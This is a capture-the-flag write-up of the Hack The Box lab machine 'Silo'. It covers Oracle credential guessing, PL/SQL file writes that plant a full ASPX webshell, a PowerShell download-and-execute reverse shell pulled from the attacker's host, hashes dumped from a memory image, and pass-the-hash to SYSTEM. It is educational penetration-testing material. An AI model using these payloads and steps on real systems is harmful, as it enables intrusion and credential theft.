Silo
Summary
I really like this machine because I had the opportunity to play with the Oracle TNS DB for the first time and learn and use some new tools that helped me on the way. To start off, I will be using this database to upload a webshell on the webserver, which is going to help me get a PowerShell shell. For privilege escalation (privesc), which is the first time I find something like this in an HTB Box, I will be playing with a memory dump file to get a hash that I can use with PassTheHash to get a shell as Administrator. There is an unintended way to get the root flag before even getting a foothold; I will talk about it in Beyond Root..
Enumeration
As always, I begin with the enumeration of ports using nmap:
➜ nmap -p- 10.10.10.82 --min-rate 5000 -oA nmap/silo -v
Scanning 10.10.10.82 [65535 ports]
Discovered open port 80/tcp on 10.10.10.82
Discovered open port 139/tcp on 10.10.10.82
Discovered open port 8080/tcp on 10.10.10.82
Discovered open port 445/tcp on 10.10.10.82
Discovered open port 135/tcp on 10.10.10.82
Discovered open port 49152/tcp on 10.10.10.82
Discovered open port 49155/tcp on 10.10.10.82
Discovered open port 49162/tcp on 10.10.10.82
Discovered open port 49153/tcp on 10.10.10.82
Discovered open port 49160/tcp on 10.10.10.82
Discovered open port 49161/tcp on 10.10.10.82
Discovered open port 47001/tcp on 10.10.10.82
Discovered open port 5985/tcp on 10.10.10.82
Discovered open port 49154/tcp on 10.10.10.82
Discovered open port 1521/tcp on 10.10.10.82
Discovered open port 49159/tcp on 10.10.10.82
Completed Connect Scan at 06:42, 12.07s elapsed (65535 total ports)
Nmap scan report for 10.10.10.82
Host is up (0.029s latency).
Not shown: 65519 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1521/tcp open oracle
5985/tcp open wsman
8080/tcp open http-proxy
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown
49161/tcp open unknown
49162/tcp open unknown
➜ nmap -sCV 10.10.10.82 -oA nmap/silo_scripts -v
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
8080/tcp open http Oracle XML DB Enterprise Edition httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=XDB
|_http-title: 401 Unauthorized
|_http-server-header: Oracle XML DB/Oracle Database
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-time:
| date: 2023-12-31T11:48:09
|_ start_date: 2023-12-31T11:18:37
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not requiredI always like to go for small attack vectors and clear them out so when I go for a wide one, I can be more flexible even with time. For example, web apps have big attack vectors compared to other services. So, I will start with RPC:
➜ rpcclient -U '' -N 10.10.10.82
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIEDI can't access RPC so I will be moving on to SMB:
➜ ~ smbclient -L //10.10.10.82/
Password for [WORKGROUP\ichyaboy]:
session setup failed: NT_STATUS_ACCESS_DENIEDSame goes for the SMB server. Keeping in mind that if I get any credentials, I can retest these two services.
I went straight for the web app on port 80, where I found nothing useful except the default page of an IIS server (version 8.5). I will start fuzzing the web app to see if there is anything.
➜ gobuster dir -u http://10.10.10.82 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --no-errorI didn't find anything, so I will move on to the next web app on port 8080. When accessing this web app, it asks immediately for login before accessing its page. I tried some default credentials, but it didn't work, so I'm leaving this web app aside until I find some creds; maybe then I can log in.
Now I went for the Oracle TNS DB. After reading about this type of database and exploring multiple attack paths, I found this article on Hacktricks (https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener) useful.
First I will be enumerating the SID using a tool called odat.
➜ odat python3 odat.py sidguesser -s 10.10.10.82 -p 1521
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue... # | ETA: 00:00:00
100% |#######################################| Time: 00:00:51XE is a valid SID.
Now I will try to get some valid credentials using the passwordguesser argument with odat.
➜ python3 odat.py passwordguesser -d XE -s 10.10.10.82
[+] Valid credentials found: scott/tiger.Setting Sqlplus up
Since I have valid credentials, I will try to connect to the DB. I will be using sqlplus to connect to the DB, but first, I need to set it up. Following 0xdf's steps, I will need to download:
instantclient-basic-linux.x64-12.2.0.1.0.zip
instantclient-sdk-linux.x64-12.2.0.1.0.zip
instantclient-sqlplus-linux.x64-12.2.0.1.0.zip
unzip em in the same directory then open your terminal source file, in my case it is zsh, and add these lines:
alias sqlplus='/opt/instantclient_12_2/sqlplus'
export PATH=/opt/instantclient_12_2:$PATH
export SQLPATH=/opt/instantclient_12_2
export TNS_ADMIN=/opt/instantclient_12_2
export LD_LIBRARY_PATH=/opt/instantclient_12_2:$LD_LIBRARY_PATH
export ORACLE_HOME=/opt/instantclient_12_2Then you will be ready to go.
Shell as defaultapppool
➜ sqlplus scott/tiger@10.10.10.82:1521/XE as sysdba
SQL*Plus: Release 12.2.0.1.0 Production on Sun Dec 31 08:41:15 2023
Copyright (c) 1982, 2016, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL>The "as sysdba" let me connect with system permissions, which facilitate reading through the database and making changes to the database configuration itself. I can see my user's permissions through:
SQL> select * from user_role_privs;I can see that I have sys perms on the db, so I will try to write an oracle script that leads to reading files.
SQL> declare
2 f utl_file.file_type;
3 s varchar(200);
4 begin
5 f:= utl_file.fopen('/inetpub/wwwroot','iisstart.htm','R');
6 utl_file.get_line(f,s);
7 utl_file.fclose(f);
8 dbms_output.put_line(s);
9 end;
10 /
PL/SQL procedure successfully completed.I successfully wrote and ran that script but I can't see the output so I will activate the serveroutput option.
SQL> set serveroutput ONthen I rerun my script by just running "/"
SQL> /
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
PL/SQL procedure successfully completed.And now I can read files. I will try to write a file to the root directory of the webapp
SQL> declare
f utl_file.file_type;
s varchar(5000) := 'ichyaboy was here';
begin
f:= utl_file.fopen('/inetpub/wwwroot','test.htm','W');
utl_file.put_line(f,s);
utl_file.fclose(f);
end;
/
PL/SQL procedure successfully completed.➜ curl http://10.10.10.82/test.htm
ichyaboy was hereGoing for webshell. I will use the cmd.aspx webshell at /usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx but I will remove the styling lines and some unnecessary lines so it will look like this
<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>SQL> declare
f utl_file.file_type;
s varchar(5000) := '<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><body ><form id="cmd" method="post" runat="server"><asp:Te 2 xtBox id="txtArg" ru 3 nat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>';
begin
f:= utl_file.fopen('/inetpub/wwwroot','givemeshell.aspx','W');
utl_file.put_line(f,s);
utl_file.fclose(f);
end;
/
PL/SQL procedure successfully completed.
By accessing http://10.10.10.82/givemeshell.aspx, I can run commands easily from the webshell. However, this shell isn't that much flexible, so I will go for a reverse shell. I will use /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1, rename it to shell.ps1, set up a Python HTTP server, and listen on port 9001.
From the webshell, I will run:
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.14/shell.ps1')"➜ www python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.82 - - [31/Dec/2023 09:09:09] "GET /shell.ps1 HTTP/1.1" 200 -
➜ ~ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.82] 49197
Windows PowerShell running as user SILO$ on SILO
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>PS C:\users\Phineas\Desktop> type user.txt
a48e****************************Privesc
Beside the user.txt file at Phineas's Desktop there is this Oracle issue.txt file.
PS C:\users\Phineas\Desktop> cat "Oracle issue.txt"
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):
Dropbox link provided to vendor (and password under separate cover).
Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0
link password:
?%Hm8646uC$I had trouble using the password because I didn't know that the first character was actually wrong due to an encoding issue. So, I will transfer the whole text as base64 to my host machine, then decode it to see what the actual password is.
PS C:\users\Phineas\Desktop> $fc = Get-Content "Oracle issue.txt"
PS C:\users\Phineas\Desktop> $fe = [System.Text.Encoding]::UTF8.GetBytes($fc)
PS C:\users\Phineas\Desktop> [System.Convert]::ToBase64String($fe)
U3VwcG9ydCB2ZW5kb3IgZW5nYWdlZCB0byB0cm91Ymxlc2hvb3QgV2luZG93cyAvIE9yYWNsZSBwZXJmb3JtYW5jZSBpc3N1ZSAoZnVsbCBtZW1vcnkgZHVtcCByZXF1ZXN0ZWQpOiAgRHJvcGJveCBsaW5rIHByb3ZpZGVkIHRvIHZlbmRvciAoYW5kIHBhc3N3b3JkIHVuZGVyIHNlcGFyYXRlIGNvdmVyKS4gIERyb3Bib3ggbGluayAgaHR0cHM6Ly93d3cuZHJvcGJveC5jb20vc2gvNjlza3J5emZzemI3ZWxxL0FBRFpuUUViYnFEb0lmNUwyZDBQQnhFTmE/ZGw9MCAgbGluayBwYXNzd29yZDogwqMlSG04NjQ2dUMk➜ cat Oracle\ issue.txt
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):
Dropbox link provided to vendor (and password under separate cover).
Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0
link password:
£%Hm8646uC$After unzipping the file
➜ file SILO-20180105-221806.dmp
SILO-20180105-221806.dmp: MS Windows 64bit crash dump, version 15.9600, 2 processors, DumpType (0x1), 261996 pagesits a memory dump file, so I will be using volatility to analyze this file but first i need a profile
➜ ./volatility kdbgscan -f SILO-20180105-221806.dmp
Instantiating KDBG using: Unnamed AS Win2012R2x64_18340 (6.3.9601 64bit)
./volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hashdump
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::Now I will use psexec from impacket to get a shell as Administrator
➜ impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 administrator@10.10.10.82
C:\Windows\system32> whoami
nt authority\system
C:\Users\Administrator\Desktop> type root.txt
fb6b****************************Beyond Root
Here, I will show how I could simply read the root.txt from the Oracle DB, which is easy. I just need to use the Oracle script I wrote to read files and specify the root.txt path.
SQL> declare
f utl_file.file_type;
s varchar(200);
begin
f:= utl_file.fopen('/Users/Administrator/Desktop','root.txt','R');
utl_file.get_line(f,s);
utl_file.fclose(f);
dbms_output.put_line(s);
end;
/
fb6b****************************
PL/SQL procedure successfully completed.Last updated